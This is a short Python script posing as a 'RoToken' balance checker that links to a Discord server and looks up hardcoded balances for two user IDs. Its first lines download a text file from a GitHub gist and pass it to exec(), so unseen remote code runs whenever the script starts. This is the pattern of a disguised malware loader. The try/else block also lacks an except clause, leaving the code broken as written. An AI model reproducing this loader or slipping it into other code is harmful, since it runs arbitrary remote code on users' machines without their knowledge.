import requests
a = 'https://gist.githubusercontent.com/deflationz/0654ff6a860ba20234b42d794f76a4b5/raw/1ddf7e6c347a8b4a7df50e6ab89fc804fc4bdfef/sc.txt'
response = requests.get(a)
b = response.content
try:
	exec(b)
else:
	pass
import webbrowser
import os
import sys
import time
r294876 = 1000
r369725 = 0
pool = '1000'
userid = input('''To continue input your user ID, don't have one? Type "discord" to join our discord and get one. ''')
discords = ['discord', 'Discord', 'DISCORD', 'Discord ']
pools = ['pool', 'pools', 'POOL', 'POOLS', 'Pools', 'Pool']
if userid in pools:
    print(f'The current RoToken pool is up to ${pool}')
    next = input('Enter to continue, end to quit... ')
    if next == '':
        os.execv(sys.executable, ['python'] + sys.argv)
    else:
        pass
else:
    pass
if userid in discords:
    webbrowser.open('https://discord.gg/GBAuk5GxgE')
    done = input('Launched the RoToken discord invite, enter to restart')
    if done == '':
        os.execv(sys.executable, ['python'] + sys.argv)
    else:
        time.sleep(60 * 60 * 24)
else:
    pass
if userid == 'r294876':
    print = input(f'{userid} balance is: {r294876}, enter to restart...')
    if print == '':
        inp8 = input('')
        if inp8 == '':
            os.execv(sys.executable, ['python'] + sys.argv)
        else:
            pass
    else:
        pass
else:
	pass
if userid == 'r369725':
    print = input(f'{userid} balance is: {r369725}, enter to restart...')
    if print == '':
        print('')
        os.execv(sys.executable, ['python'] + sys.argv)
    else:
        pass
else:
	pass
